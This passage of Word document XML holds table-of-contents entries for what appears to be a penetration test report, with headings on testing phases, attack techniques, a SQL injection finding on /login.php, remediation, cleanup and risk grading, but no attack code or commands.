              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3196CDFA" w14:textId="77F87AF6"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78" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498978 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0168C40B" w14:textId="0E795B4B"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79" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Phases of Penetration Testing (Senior Pentester’s Approach)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498979 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B3593C4" w14:textId="5B6DC851"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80" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Testing Frameworks &amp; Standards</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498980 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4172A1C4" w14:textId="38B23AEF"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81" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Tools Used</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498981 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65B4C031" w14:textId="1202CC41"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82" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Attack Techniques</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498982 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="623E142E" w14:textId="316C4A47"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83" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Manual vs. Automated Testing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498983 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="029916A3" w14:textId="62826273"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84" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Assessment &amp; Prioritization</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498984 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46060A3C" w14:textId="26C35CBC"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85" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>False Positives and Validation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498985 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="70C38147" w14:textId="59F0CB24"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86" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498986 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17437DB4" w14:textId="01BEB1D8" w:rsidR="008D468E" w:rsidRDefault="008D468E">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87" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>ASSESSMENT FINDINGS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498987 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="133A0E14" w14:textId="62DDCBAE" w:rsidR="008D468E" w:rsidRDefault="008D468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88" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. SQL Injection Vulnerability on /login.php (Critical)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498988 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="353AC4C5" w14:textId="158BCB8E"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89" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Information Gathering (Reconnaissance)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498989 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A9B998D" w14:textId="1816B4CC"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90" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerability Details</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498990 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E5E83DA" w14:textId="5DAB7E5B"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91" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Used tools</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498991 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7AF4FC90" w14:textId="0B91C6DA"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92" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Analysis and Steps to Reproduce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498992 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="238A0D43" w14:textId="2532746B"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93" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498993 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="022B7B04" w14:textId="39DE7A8E"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94" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Post Penetration Cleanup</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498994 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>38</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="591AFA5B" w14:textId="3C1ABA6D"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95" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>References  (opt)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498995 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B034DD9" w14:textId="7C7E31AA" w:rsidR="008D468E" w:rsidRDefault="008D468E">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96" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498996 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48CE780A" w14:textId="27E44BC9" w:rsidR="008D468E" w:rsidRDefault="008D468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97" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>A- CLASSIFICATION DEFINITIONS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498997 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33DFFB5D" w14:textId="2BED3378"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98" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Classifications</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498998 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32BAEF8F" w14:textId="2E0D0B73"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8999" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Risk Grades</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498999 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
